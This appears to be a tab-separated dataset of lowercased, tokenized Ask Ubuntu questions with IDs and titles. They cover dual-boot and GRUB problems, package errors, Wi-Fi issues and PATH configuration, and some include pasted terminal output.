309999	no boot screen ( dual screen and dual boot )	when my computer starts the bios posts i get into the windows boot manager . there i select ubuntu . my screen goes black but with the backlight still on . until after half a minute it turns white and my background appears ( auto-login no login screen ) . i would like to see the log as my computer starts up . how would i fix it ? i am using a dual boot with windows ( infected by a trojan horse for fourth time ! ) and ubuntu 12.04 lts edit note : it has been working when i did n't have my dual-screen setup edit note 2 : i have a nvidia geforce graphical card in my pc . ( ubuntu does n't detect both my screens until i setup dual screen via the nvidia configuration screen
310001	installing 13.04 server on hardware raid 0 . fails to install grub on /dev/mapper	i am installing 13.04 server using guided setup . it is going on a hardware raid 0 . everything is working swell until i get to where i need to install grub . it gives examples of /dev/sda and /dev/sdb and such . since it is a raid 0 is has defaulted to /dev/mapper reading other questions it seems i need to complete this with /dev/mapper/ how do i find this raid name ?
310010	error with building libreoffice 4.0.2.2 ( in a virtual machine )	i tried to build libreoffice 4.0.2.2 on ubuntu 13.04 x86-64 using virtualbox . an error has occurred which says : no suitable windowing system found , exiting . any ideas on how to solve this problem ?
310015	windows 7 slow bootup after installing ubuntu	my initial machine was windows 7 x64 . then i decided to try ubuntu 12.04. so as of now ubuntu 12.04 is installed in another partition and it really boots fast . however when i select windows 7 as my operating system on the grub selection menu it tooks about 30seconds before it boots to the login screen . before i installed ubuntu 12.04 on dual boot windows 7 does n't boot this long . is there anyway to fix this ?
310017	boot and run from usb	is it possible for me to run and use ubuntu or other linux from usb and it will remember what i did ? ? ? like if i installed it on a computer ? ? eg . if i write a dockument , will it remember it and how do i do it ? i have tried all the programs i have found on the net , but nothing helped , is it even possible ? hope for answer .
310022	use both suspend-freeze and pm-suspend	i 'm using ubuntu raring and mainline kernel 3.9.4 i like the fast resume times pm-suspend-freeze is capable of , however i still want to have the lower power consuming suspend available . from what i 've read it 's only possible to use one or the other : http : //kernelnewbies.org/linuxchanges # head-82ff281c802c350623a8b7dec846e8754a87ef40 ideally , i 'd be able to close my laptop and ps-suspend-freeze would be executed . however if i went in the power menu and chose suspend in the top right of unity the traditional pm-suspend ( to memory ) command would be executed . this would give me the ability to hop in and out of suspend-freeze and quickly use the laptop , close the lid and save power by idling . and if i plan to not use it for a few hours , suspend to memory .
310025	mysql server installed but not running	i tried to install mysql 5.6.12 using the following procedure # preconfiguration setup shell > groupadd mysql shell > useradd -r -g mysql mysql # beginning of source-build specific instructions shell > tar zxvf mysql-version.tar.gz shell > cd mysql-version shell > cmake . shell > make shell > make install # end of source-build specific instructions # postinstallation setup shell > cd /usr/local/mysql shell > chown -r mysql . shell > chgrp -r mysql . shell > scripts/mysql_install_db -- user=mysql shell > chown -r root . shell > chown -r mysql data # next command is optional shell > cp support-files/my-default.cnf /etc/my.cnf shell > bin/mysqld_safe -- user=mysql & # next command is optional shell > cp support-files/mysql.server /etc/init.d/mysql.server source : [ installing mysql using a standard source distribution ] [ 1 ] now the problem is i did shell > /etc/init.d/mysql.server start * mysql is running but when i do something like shell > mysql the program 'mysql ' is currently not installed . you can install it my typing : apt-get install mysql-client-core-5.5 now what should i do . please help .
310026	how to install citrix receiver xubuntu 13.04 64-bit	anyone have a walkthrough on installing citrix receiver on xubuntu 13.04 64-bit ? update $ sudo apt-get install libmotif4 nspluginwrapper ... snip ... setting up libmotif4 : amd64 ( 2.3.3-7ubuntu1 ) ... setting up nspluginviewer ( 1.4.4-0ubuntu5 ) ... setting up nspluginwrapper ( 1.4.4-0ubuntu5 ) ... plugin dirs : nspluginwrapper : no appropriate viewer found for /usr/lib/flashplugin-installer/libflashplayer.so auto-update plugins from /usr/lib/mozilla/plugins looking for plugins in /usr/lib/mozilla/plugins segmentation fault ( core dumped ) processing triggers for libc-bin ... ldconfig deferred processing now taking place sudo dpkg -- install downloads/icaclient_12.1.0_amd64.deb selecting previously unselected package icaclient . ( reading database ... 155808 files and directories currently installed . ) unpacking icaclient ( from ... /icaclient_12.1.0_amd64.deb ) ... dpkg : dependency problems prevent configuration of icaclient : icaclient depends on libc6-i386 ( > = 2.7-1 ) ; however : package libc6-i386 is not installed . icaclient depends on ia32-libs ; however : package ia32-libs is not installed . icaclient depends on lib32z1 ; however : package lib32z1 is not installed . icaclient depends on lib32asound2 ; however : package lib32asound2 is not installed . dpkg : error processing icaclient ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : icaclient
310027	update manager does not install updates anymore	the update manager has n't been working properly for a while . i 've got a number of updates that 've stacked up , because of this very problem . each time that i go for installing the updates , i get a message saying that the updates contain untrusted packages , however that can not be the case , all the additional ppas that have been added , i 've done them myself , and till some time back they used to work perfectly , now however things are different . i 'm posting images of the update manager , the error message and i 'll enter the error details below . any help would be great . update manager error error details apport apport-gtk bash-completion cups cups-bsd cups-client cups-common cups-ppdc dbus dbus-x11 flashplugin-installer google-chrome-stable gvfs gvfs-backends gvfs-bin gvfs-common gvfs-daemons gvfs-fuse gvfs-libs isc-dhcp-client isc-dhcp-common kdelibs-bin kdelibs5-data kdelibs5-plugins kdoctools libcups2 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsmime1 libcupsppdc1 libdbus-1-3 libfs6 libgnutls-dev libgnutls-openssl27 libgnutls26 libgnutlsxx27 libgstreamer-plugins-base0.10-dev libgstreamer0.10-dev libkcmutils4 libkde3support4 libkdeclarative5 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 liblightdm-gobject-1-0 libnepomuk4 libnepomukquery4a libnepomukutils4 libplasma3 libplymouth2 libpulse-mainloop-glib0 libpulse0 libpulsedsp libraw5 libsolid4 libthreadweaver4 libtiff4 libtiff4-dev libtiffxx0c2 libx11-6 libx11-data libx11-dev libx11-doc libx11-xcb1 libxcb-composite0 libxcb-dri2-0 libxcb-glx0 libxcb-randr0 libxcb-render0 libxcb-render0-dev libxcb-shape0 libxcb-shm0 libxcb-shm0-dev libxcb-sync0 libxcb-xfixes0 libxcb-xv0 libxcb1 libxcb1-dev libxcursor-dev libxcursor1 libxext-dev libxext6 libxfixes-dev libxfixes3 libxi-dev libxi6 libxinerama-dev libxinerama1 libxp6 libxrandr-dev libxrandr2 libxrender-dev libxrender1 libxres1 libxslt1-dev libxt-dev libxt6 libxtst6 libxv1 libxvmc1 libxxf86dga1 libxxf86vm1 lightdm linux-image-3.2.0-48-generic-pae linux-image-generic-pae linux-libc-dev plymouth plymouth-label plymouth-theme-ubuntu-logo plymouth-theme-ubuntu-text pulseaudio pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python-apport python-apt python-apt-common python-paramiko python-problem-report rsyslog telepathy-gabble xdiagnose xserver-xorg-video-openchrome here
310030	can not remove application	i 'm tyring to remove postgresql-client-common from my machine but i 'm getting this error : e : postgresql-9.2 : subprocess installed pre-removal script returned error exit status 2 e : postgresql-client-9.2 : subprocess installed pre-removal script returned error exit status 2 e : postgresql-common : subprocess installed pre-removal script returned error exit status 2 i 've tried : sudo apt-get -f install but it fails also : lucid @ ubuntu : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : postgresql-9.2 postgresql-client-9.2 postgresql-client-common postgresql-common 0 upgraded , 0 newly installed , 4 to remove and 561 not upgraded . 4 not fully installed or removed . after this operation , 23.6mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 131347 files and directories currently installed . ) removing postgresql-9.2 ... dpkg ( subprocess ) : unable to execute installed pre-removal script : exec format error dpkg : error processing postgresql-9.2 ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 dpkg ( subprocess ) : unable to execute installed post-installation script : exec format error dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 removing postgresql-client-9.2 ... dpkg ( subprocess ) : unable to execute installed pre-removal script : exec format error dpkg : error processing postgresql-client-9.2 ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 removing postgresql-common ... dpkg ( subprocess ) : unable to execute installed pre-removal script : exec format error dpkg : error processing postgresql-common ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 removing postgresql-client-common ... dpkg ( subprocess ) : unable to execute installed post-removal script : exec format error dpkg : error processing postgresql-client-common ( -- remove ) : subprocess installed post-removal script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : postgresql-9.2 postgresql-client-9.2 postgresql-common postgresql-client-common e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how to i fix this ? i 'm using ubuntu 10.04
310038	unable to install ubuntu 13.04 along side windows 8 on dell inspiron 3521	i bought a new laptop - dell inspiron 3521 which came preloaded with windows 8 and gpt partitioning . as usual , my first step after buying a new laptop is to install ubuntu . hence followed this guide - installing ubuntu on a pre-installed uefi supported windows 8 system and disabled secure boot ( uefi is still enabled ) and installed ubuntu 13.04 now restarted my system . now i do n't see grub . when i selected f10 to enter boot options , i see both ubuntu and windows boot manager options . i am able to enter windows but when i select ubtuntu , it takes me to grub command line but not gui . i even tried repairing with boot manager but still it did n't help . boot repair continues till some steps and fails saying - `` please close all your package managers and continue '' . i have verified that there are no package managers running . but still it says the same . here is my boot repair summary - http : //paste.ubuntu.com/5779528/ i tried other ways as well but was not able to boot into ubuntu . please help . thanks
310042	`` no installable kernel was found in the defined apt sources ''	i 'm trying to install an old ubuntu-10.04.4-server-amd64.iso on a custom machine , which uses a vortex86 processor . the installation works fine , but it ca n't install a kernel . `` no installable kernel was found in the defined apt sources '' i continued and finished the installation without installing a kernel . then i tried to switch to a virtual shell for executing apt-install linux-image-generic ( seen in this guide ) , but there 's no package named so . the fun story is that with the lubuntu-10.04-desktop-i386.iso everything works well with the i386 image ... ! now i 've got a base system without kernel . i 've also got a custom package from the vendor : linux-image-2.6.34.10-vortex86-sg_1.3_i386.deb . but , there 's a way to install this kernel without booting ( like starting a live and chrooting on the target system ) ? thanks .
310045	how to install e17 on ubuntu server	i 'd like to install e 17 on ubuntu server and have added the ppa and installed lightdm allready . but when i try to choose e17 at the login there is no option to choose it . when i log in the screen gets black and a second later ldm is on screen again . mey any one help me , please . thanks a lo .
310048	how to release a locked file	we have a file server running ubuntu server . sometime , when one of the users is using a file and closing it , the server still shows that the file is locked for editing . how can i release that lock ? is there a fix for this problem ? the ubuntu server is 10.xx . thanx erez
310055	unbuntu 13.04 : synchronizing an iphone 's contacts and calendar without ubuntu one	what is the best solution to synchronize the contacts and calendar of an iphone with your local ubuntu installation ? note : thunderbird with its lighning extension currently seems to be the best calendar/contacts solution , so that 's what i plan on using . the broad global surveillance revelations of the last few weeks have made it clear for me that storing my data `` in the cloud '' is not a good idea , so i 'll also abstain from using ubuntu one .
310058	installing ubuntu on toshiba satellite	i 'm using ubuntu since few month ( january 2013 ) and i 'm still a beginner . i want to know if is it possible to install any version of ubuntu on my new toshiba satellite pro l830 15k and if there will be any problem of compatibility . i put a link with the features of that machine . http : //www.toshiba.eu/laptops/satellite-pro/l830/satellite-pro-l830-15k/
310059	ubuntu adding path/environment variables	i am trying to install apache maven 3 in ubuntu 12.04 lts . what i did was open the terminal then i typed the following commands export m2_home=/usr/local/apache-maven/apache-maven-3.0.5 [ then pressed enter ] export m2= $ m2_home/bin [ then pressed enter ] export path= $ m2 : $ path [ then pressed enter ] after that i typed mvn -- version and it displayed all the necessary information but after closing the terminal , again i typed the command mvn -- version then it said that 'mvn ' is not recognized the program 'mvn ' can be found in the following packages : * maven * maven2 try sudo apt-get install < selected-page > is there a way to permanently add a path variable in ubuntu ?
310061	vmlinuz.efi : not found error	i am using ubuntu-builder_2.4.1-gb3-1_all.deb version 2.4.1 debian package ( gambas 3 ) in my host machine which runs ubuntu 13.04 . i am using the same version 64-bit iso to customize it using the ubuntu-builder.gambas . everything works fine , and i created the iso file . but when i run it in qemu or virtualbox , it shows a popup message box saying /casper/vmlinuz.efi : file not found . the screenshot shown below is from virtualbox : in the casper directory of the iso made by the builder there is no file named vmlinuz.efi
310063	replaced window7 ( 4drives ) with ubuntu13.04 ( empty ) lost all data , testdisk did not help	i have 500gb of hdd with 4 drives on windows7 , while installing ubuntu 13.04 i selected replace windows ( expected to replace windows7 on c drive ) but it removed all the data from other 3 drives and not its single empty ext4 hdd . i have lost all data . by referring askubuntu tried testdisk to recover lost partitions but this did not list any ntfs drives . is there any way back to get my data , i am all ready to keep ubuntu or go back to windows to get my data . i connected this hdd to another window7 system , it did not recognize this hdd .
310078	extreme problems - something is eating up all disk space constantly	i have so much trouble with disk space , it 's crazy . my hdd constantly gets full even though i have 2 tb . i figured out fairly quickly that the file .xsession-errors was huge and eating up a big part of the disk space ( several hundred gb ) . i think this is caused thanks to the program teamviewer , it says something about vino-server and when teamviewer is running it always ends up under the vino-symbol ( the glass ) . the file always explodes in size when teamviewer is running . i 've removed .xsession-errors and restarted the computer countless times . but i really need to run teamviewer as i use it every day . naturally i 've spent a lot of time googling on how to deal with the .xsession-errors file . i tried a couple of things that did n't work . the one that did seem to work , because .xsession-errors was at 0 kb constantly , was the chattr -i command that keeps the file open and do n't let anything write to it . problem solved.. or so i thought . something is -still- eating up all the disk space , but this time i ca n't find the problem ! i ca n't find any file that is taking up all the space . now i 'm getting so many problems i ca n't even restart the computer because there is no disk space available . i enter my user with ctrl + alt + f6 , and i have to delete huge folders ( > 20gb ) i do n't really want to delete , but i have to in order to be able to start the computer properly . please help ? i 'm using ubuntu 12.04 lts , 64 bit . teamviewer is the latest version available on their website , v8.0.17147 .
310079	install cherrypy for python3.3	please assist me to install cherrypy3.2 to work/run on python3.3 . i am using ubuntu 13.04 and have python3.3 installed already . i had downloaded cherrypy3.2.2 and had tried to install it without any error messages noticed but when i try to import cherrypy i get an error message . here 's what i get . aspire @ aspire : ~ $ python3.3 -c `` import cherrypy '' traceback ( most recent call last ) : file `` < string > '' , line 1 , in < module > file `` /usr/local/lib/python3.3/dist-packages/cherrypy-3.2.2-py3.3.egg/cherrypy/__init__.py '' , line 82 , in < module > from cherrypy import process file `` /usr/local/lib/python3.3/dist-packages/cherrypy-3.2.2-py3.3.egg/cherrypy/process/__init__.py '' , line 14 , in < module > from cherrypy.process import plugins , servers file `` /usr/local/lib/python3.3/dist-packages/cherrypy-3.2.2-py3.3.egg/cherrypy/process/plugins.py '' , line 424 , in < module > class perpetualtimer ( threading._timer ) : attributeerror : 'module ' object has no attribute '_timer' aspire @ aspire : ~ $
310081	how can i pick different locales for different locale categories	i would like to have different setting for various locales , so per https : //help.ubuntu.com/community/locale i edited /etc/default/locale . however , the file does not get picked up ( after rebooting ) and the settings from system settings > langugage support are used . ( i.e . running locales and cat /etc/default/locale yields very different results ) . how can i force the system to use the setting from /etc/default/locale ?
310087	problem with eclipse : `` an error has occurred . see the log file ... ... ''	i have ubuntu 13.04 and when i want run vega program by ./vega i get this message an error has occurred . see the log file /home/engalaabt/.eclipse/1150212041/configuration/1371636662714.log . so what is the problem and how i can fix it ?
310088	in sqlite shell ( cli ) how to end the statement input after ^ ] ] a ?	confessing , this is not ubuntu-specific , but sqlite shell-specific . anyway , maybe one of you out there know some hint . i 'm a linux starter btw ... i 'm typing with sqlite and using its shell , accidentally typing the up arrow key . unfortunately there is no history readline functionality linked with it , and no , i ca n't change that . the shell input is waiting for some end line identified , but probably is in some special escaped-mode ... . so my shell session is to perish by me pressing ctrl+z . any other key i tried did not change a thing . does anyone have a hint ? can that behaviour be changed so that when pressing those `` special '' keys of a standard keyboard just happen to do nothing ?
310089	how to change default font size in menus after wine ?	i am using wine 1.4.1 to run ms word 2010 in ubuntu 12.10 . yet , the font size and menus in word are just too small . have a look : is there a way for me to change the word font size and menu sizes ? i.e . the fonts of the system ? i tried following these instructions ( to no avail ) , and also gave a look into these ( though the problem is very different ) . thanks
310093	compare directory tree	does there exist a tool that compare directory tree ( files . sub dirs ) and show you waht is missing . i have an upload too which i 'm coding and would like to see if it does not mess with structure . nothing big just show me how does directory x compare with y to clarify more here is an example the tree dir1+ +subdir1 +sudir2 +file1 +file2 and the tree dir1+ +subdir1 +sudir2 +file1 +file2 are the same but tree dir1+ +subdir1 +sudir2 +file1 +file2 and tree dir1+ +subdir1 +sudir2 +file1 +file3 should show me that file2 is missing and file3 is added . does such a tool exists ?
310094	convert and rotate video from mov ( iphone ) to wmv ( windows )	i have been assigned a task that seems to be really hard for me . i want to convert a video taken with iphone4 ( .mov ) to a format that can be understood by powerpoint ( .wmv ? ) i tried avidemux , but i do n't know which is the correct format i must save the rotated file to . i am using ubuntu 12.10
310096	ca n't open pdf . error : file type unknown ( application/octet-stream ) is not supported	i am struggling to open an important pdf file i have on my ubuntu 12.04 , which is probably created on ms windows ( assuming since it has some formatting issue ) . when i open the file using a pdf viewer it show me this error : file type unknown ( application/octet-stream ) is not supported i tried to open it using console , too . here is the output : â pdf : gnome-open mypdf.pdf error : may not be a pdf file ( continuing anyway ) error ( 30 ) : illegal character ' { ' error : pdf file is damaged - attempting to reconstruct xref table ... error : could n't find trailer dictionary error : could n't read xref table â pdf : evince my pdf.pdf error : may not be a pdf file ( continuing anyway ) error ( 30 ) : illegal character ' { ' error : pdf file is damaged - attempting to reconstruct xref table ... error : could n't find trailer dictionary error : could n't read xref table can anybody help me with solving this issue and to fix this ? thanks surya
310098	ubuntu software center states ''no network connection '' in reviews , but internet available elsewhere	my computer is connected to the internet via mobile broadband . but when opening ubuntu software center and want to read reviews it says no network connection , connect to the internet to see more reviews although i can install application without problem .
310106	wireless networking on ubuntu 12.04 machine	my machine is dual boot windows 7 and ubuntu 12.04 . a new laptop with ubuntu 12.04 made me reconfigure my modem . now i have internet connectivity on windows and the laptop , but not on ubuntu . after booting , the wireless connection is established automatically , but i am not able to ping 192.168.1.1 . what i have done so far . saw to it that the ip addresses on windows and ubuntu is the same added nameserver in /etc/resolv.conf and /etc/resolvconf/resolv.conf.d/head sudo resolvconf -u sudo service network-manager restart still no connection . ifconfig -a output : eth0 link encap : ethernet hwaddr 70:71 : bc:3c:3d : bc up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : fb100000-fb120000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:314 errors:0 dropped:0 overruns:0 frame:0 tx packets:314 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:28913 ( 28.9 kb ) tx bytes:28913 ( 28.9 kb ) wlan0 link encap : ethernet hwaddr 1c : bd : b9:81:3a:8f inet addr:192.168.1.85 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :1ebd : b9ff : fe81:3a8f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:742 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:89112 ( 89.1 kb ) nm-tool output : networkmanager tool state : connected ( global ) device : wlan0 [ www ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rt2800usb state : connected default : yes hw address : 1c : bd : b9:81:3a:8f capabilities : speed : 36 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *www : infra , 00 : fd:07:9c:78:5b , freq 2412 mhz , rate 54 mb/s , strength 63 wep ipv4 settings : address : 192.168.1.85 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 59.185.0.23 device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : 70:71:1d:3c:3d : bc capabilities : carrier detect : yes wired properties carrier : off route output : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 link-local * 255.255.0.0 u 1000 0 0 wlan0 192.168.1.0 * 255.255.255.0 u 2 0 0 wlan0 lsusb output : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 006 : id 1c4f:0003 sigma micro hid controller bus 001 device 004 : id 046d : c31d logitech , inc . bus 001 device 007 : id 07d1:3c16 d-link system dwa-125 wireless n 150 adapter ( rev.a2 ) [ ralink rt3070 ] bus 002 device 005 : id 0951:162d kingston technology i checked /etc and found there was no wireless folder . i installed the driver for dwa-125 but still no connectivity .
310107	wifi wo n't work under 12.10	i have a bcm4312 broadcom card . when i type iwconfig i have no wireless extensions . i know there is not a problem with my router because other devices connect fine , and my computer connects through ethernet . i had no problem connecting to wifi in 10.10 before i updated today . there is nothing about wireless at all in the network icon . i have tried downloading and installing several drivers but i 'm really not sure what i 'm doing . i 've tried following the directions in all the questions that are similar to mine ...
310113	12.04 programs opening very slow .	i am totally new to ubuntu , so a i had a lot of trouble finding a solution amongst the previous q & a`s . when i click on a program it takes quite a while for them to open . ( up to 20 secs ) its most worse with firefox and software center , less with the dash and home folder , but still considerably annoying . it is not just after boot . ( like in one previous q & a ) if i close a program like firefox without leaving any tabs open , it takes again 15 secs to re-open . system : release 12.04 ( precise ) 64-bit kernel linux 3.5.0-34-generic gnome 3.4.2 memory : 995.0 mib ( 1022mib swap ) processor : amd athlon ( tm ) 64 x2 dual core processor 3800+ ă 2 videocard : xfx qf 7600 gt 256mb ddr3 ( pci-e ) the videodrivers are installed , and neither of the three versions i can choose from make a difference . windows also ran very smoothly on this computer . i installed ubuntu on a 250 gb drive , just using the auto partition and erasing everything .
310127	problem with path when using $ su	ok , i 'm having a bit of an issue with path and running a process as another user under ubuntu . first , we check where the bin is : root @ host : ~ # whereis start-stop-daemon start-stop-daemon : /sbin/start-stop-daemon /usr/share/man/man8/start-stop-daemon.8.gz ok , /sbin/start-stop-daemon so ti 's in /sbin . then we check path as a user we want to run the app : root @ host : ~ # su wojtek -c `` echo $ path '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/bin/x11 : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games root @ host : ~ # su -l wojtek -c `` echo $ path '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/bin/x11 : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games in both cases the path is exactly the same ( ie . in normal su and with full login ) yet there is a distinction when we actually want to run the command : root @ host : ~ # su wojtek -c `` start-stop-daemon '' bash : start-stop-daemon : command not found root @ host : ~ # su -l wojtek -c `` start-stop-daemon '' start-stop-daemon : need one of -- start or -- stop or -- status try 'start-stop-daemon -- help ' for more information . can somebody try to explain where the difference comes from ? because for me there should n't be any error as there is no difference in path thus $ start-stop-daemon for a given user should work either way ... also - if i switch to different user ( $ su user and $ su - user ) then $ start-stop-daemon in both cases ... what am i missing ?
310131	`` something wicked happened '' error in apt-get	everytime i try to install through terminal i get this '' i am not able to install or update and i ca n't find working answer for this here . here is my apt-get update result : hit http : //ppa.launchpad.net raring release.gpg hit http : //deb.opera.com stable release.gpg hit http : //ppa.launchpad.net raring release.gpg hit http : //deb.opera.com stable release hit http : //ppa.launchpad.net raring release hit http : //deb.opera.com stable/non-free i386 packages hit http : //ppa.launchpad.net raring release hit http : //ppa.launchpad.net raring/main i386 packages hit http : //ppa.launchpad.net raring/main i386 packages ign http : //deb.opera.com stable/non-free translation-en_us ign http : //deb.opera.com stable/non-free translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //ppa.launchpad.net raring/main translation-en err http : //archive.ubuntu.com raring release.gpg something wicked happened resolving 'archive.ubuntu.com : http ' ( -11 - system error ) err http : //extras.ubuntu.com raring release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -11 - system error ) err http : //dl.google.com stable release.gpg something wicked happened resolving 'dl.google.com : http ' ( -11 - system error ) ign https : //private-ppa.launchpad.net quantal release.gpg err http : //archive.ubuntu.com raring-updates release.gpg something wicked happened resolving 'archive.ubuntu.com : http ' ( -11 - system error ) get:1 http : //archive.ubuntu.com raring-security release.gpg [ 933 b ] get:2 http : //archive.ubuntu.com raring-proposed release.gpg [ 933 b ] get:3 http : //archive.ubuntu.com raring-backports release.gpg [ 933 b ] hit http : //archive.ubuntu.com raring release get:4 http : //archive.ubuntu.com raring-updates release [ 40.8 kb ] get:5 http : //archive.ubuntu.com raring-security release [ 40.8 kb ] ign http : //extras.ubuntu.com raring release ign http : //dl.google.com stable release ign https : //private-ppa.launchpad.net quantal release get:6 http : //archive.ubuntu.com raring-proposed release [ 40.8 kb ] hit http : //archive.ubuntu.com raring-backports release ign http : //archive.ubuntu.com raring/main sources/diffindex ign http : //archive.ubuntu.com raring/restricted sources/diffindex ign http : //archive.ubuntu.com raring/universe sources/diffindex ign http : //archive.ubuntu.com raring/multiverse sources/diffindex ign http : //archive.ubuntu.com raring/main i386 packages/diffindex ign http : //archive.ubuntu.com raring/restricted i386 packages/diffindex ign http : //archive.ubuntu.com raring/universe i386 packages/diffindex ign http : //archive.ubuntu.com raring/multiverse i386 packages/diffindex hit http : //archive.ubuntu.com raring/main translation-en hit http : //archive.ubuntu.com raring/multiverse translation-en hit http : //archive.ubuntu.com raring/restricted translation-en ign http : //dl.google.com stable/main i386 packages/diffindex hit http : //archive.ubuntu.com raring/universe translation-en ign http : //archive.ubuntu.com raring-updates/main sources/diffindex ign http : //archive.ubuntu.com raring-updates/restricted sources/diffindex ign http : //archive.ubuntu.com raring-updates/universe sources/diffindex ign https : //private-ppa.launchpad.net quantal/main i386 packages/diffindex ign http : //archive.ubuntu.com raring-updates/multiverse sources/diffindex ign http : //archive.ubuntu.com raring-updates/main i386 packages/diffindex hit http : //dl.google.com stable/main i386 packages ign http : //archive.ubuntu.com raring-updates/restricted i386 packages/diffindex ign http : //archive.ubuntu.com raring-updates/universe i386 packages/diffindex ign http : //archive.ubuntu.com raring-updates/multiverse i386 packages/diffindex hit http : //archive.ubuntu.com raring-updates/main translation-en hit http : //archive.ubuntu.com raring-updates/multiverse translation-en hit http : //archive.ubuntu.com raring-updates/restricted translation-en hit http : //archive.ubuntu.com raring-updates/universe translation-en get:7 http : //archive.ubuntu.com raring-security/main sources [ 24.7 kb ] get:8 http : //archive.ubuntu.com raring-security/restricted sources [ 14 b ] get:9 http : //archive.ubuntu.com raring-security/universe sources [ 4,802 b ] get:10 http : //archive.ubuntu.com raring-security/multiverse sources [ 690 b ] hit https : //private-ppa.launchpad.net quantal/main i386 packages ign http : //dl.google.com stable/main translation-en_us get:11 http : //archive.ubuntu.com raring-security/main i386 packages [ 67.9 kb ] ign http : //dl.google.com stable/main translation-en get:12 http : //archive.ubuntu.com raring-security/restricted i386 packages [ 14 b ] get:13 http : //archive.ubuntu.com raring-security/universe i386 packages [ 19.2 kb ] get:14 http : //archive.ubuntu.com raring-security/multiverse i386 packages [ 1,403 b ] hit http : //archive.ubuntu.com raring-security/main translation-en ign http : //extras.ubuntu.com raring/main sources/diffindex hit http : //archive.ubuntu.com raring-security/multiverse translation-en hit http : //archive.ubuntu.com raring-security/restricted translation-en hit http : //archive.ubuntu.com raring-security/universe translation-en get:15 http : //archive.ubuntu.com raring-proposed/universe i386 packages [ 18.0 kb ] get:16 http : //archive.ubuntu.com raring-proposed/main i386 packages [ 29.9 kb ] get:17 http : //archive.ubuntu.com raring-proposed/multiverse i386 packages [ 14 b ] get:18 http : //archive.ubuntu.com raring-proposed/restricted i386 packages [ 14 b ] hit http : //archive.ubuntu.com raring-proposed/main translation-en hit http : //archive.ubuntu.com raring-proposed/multiverse translation-en hit http : //archive.ubuntu.com raring-proposed/restricted translation-en hit http : //archive.ubuntu.com raring-proposed/universe translation-en hit http : //archive.ubuntu.com raring-backports/multiverse i386 packages hit http : //archive.ubuntu.com raring-backports/main i386 packages hit http : //archive.ubuntu.com raring-backports/restricted i386 packages hit http : //archive.ubuntu.com raring-backports/universe i386 packages hit http : //archive.ubuntu.com raring-backports/main translation-en ign https : //private-ppa.launchpad.net quantal/main translation-en_us hit http : //archive.ubuntu.com raring-backports/multiverse translation-en hit http : //archive.ubuntu.com raring-backports/restricted translation-en hit http : //archive.ubuntu.com raring-backports/universe translation-en hit http : //archive.ubuntu.com raring/main sources ign https : //private-ppa.launchpad.net quantal/main translation-en hit http : //archive.ubuntu.com raring/restricted sources hit http : //archive.ubuntu.com raring/universe sources hit http : //archive.ubuntu.com raring/multiverse sources hit http : //archive.ubuntu.com raring/main i386 packages hit http : //archive.ubuntu.com raring/restricted i386 packages hit http : //archive.ubuntu.com raring/universe i386 packages hit http : //archive.ubuntu.com raring/multiverse i386 packages get:19 http : //archive.ubuntu.com raring-updates/main sources [ 37.0 kb ] get:20 http : //archive.ubuntu.com raring-updates/restricted sources [ 14 b ] get:21 http : //archive.ubuntu.com raring-updates/universe sources [ 49.8 kb ] ign http : //extras.ubuntu.com raring/main i386 packages/diffindex get:22 http : //archive.ubuntu.com raring-updates/multiverse sources [ 690 b ] get:23 http : //archive.ubuntu.com raring-updates/main i386 packages [ 93.5 kb ] get:24 http : //archive.ubuntu.com raring-updates/restricted i386 packages [ 14 b 